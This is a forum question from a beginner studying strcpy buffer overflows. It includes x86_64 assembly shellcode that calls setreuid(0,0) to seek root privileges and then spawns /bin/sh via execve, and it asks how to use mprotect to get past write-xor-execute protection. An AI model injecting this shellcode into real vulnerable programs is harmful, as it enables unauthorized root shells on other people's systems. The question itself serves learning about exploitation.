How to write inside string stored in executable .text section of ASM code?

Question

I'm trying to write a shellcode to play with a strcpy vulnerability, trying to understand a bit more about how that stuff works.

So far i've managed to inject a sort of "hello world" written in assembly in my vulnerable program and i got that working.

Now i'm trying to get the next step, which is to spawn a shell in my ASM code, rather than just printing a meme sentence.

I have the following ASM code, which is basically Linux example 3 from here updated for my x86_64 machine:

          ;; ASM Hello World x86_64 Linux
          global _start
          section .text
  _start:

          ;; setreuid syscall
          xor rax, rax            ; rax = syscall id
          xor rdi, rdi            ; rdi is arg0. = 0 for root priv
          xor rsi, rsi            ; rsi is arg1. = 0 for root priv
          mov al, 113             ; setreuid is syscall 113
          syscall                 ; call setreuid to get root priv if possible

          jmp short ender
        
  payload:
        
          ;;  execve syscall

          pop rdx                 ; get the string address
          xor rax, rax
          mov [rdx+7], al       ; put a null where the N is
          mov [rdx+8], rdx      ; put the address of the string where AAAAAAA is
          mov [rdx+16], rax     ; put a bunch of NULLs where the BBBBBBBB is
          mov rdi, rdx
          lea rsi, [rdx+8]
          lea rdx, [rdx+16]
          mov al, 59              ; execve is syscall 59
          syscall
        
  ender:
          call payload
          db '/bin/shNAAAAAAAABBBBBBBB'

As a first step i try to run this on its own, unrelated to the buffer overflow vulnerability in the C program. When i do so, i get a segfault at mov [rdx+7], al.

I'm thinking this might be because of the Write XOR Execute security mechanism, that prevents me from writing over executable memory, but since i'm definitely a beginner here, can someone confirm that's what's happening, as opposed to the code being wrong ?

If indeed i am blocked by the security mechanism, Can i bypass that with a call to mrotect to set my memory page as writeable AND executable?

From the mprotect documentation, i understand i need to provide the first address of my memory page, could i get some help on how to get this value in my asm code ?

I did see this other question that seems highly related and might confirm the write/exec mechanism is my first problem. It also contains a call to mprotect, but if i understand correctly they use a harcoded value of 0xff for the address of their memory page, which i don't understand.

Thanks a lot, o7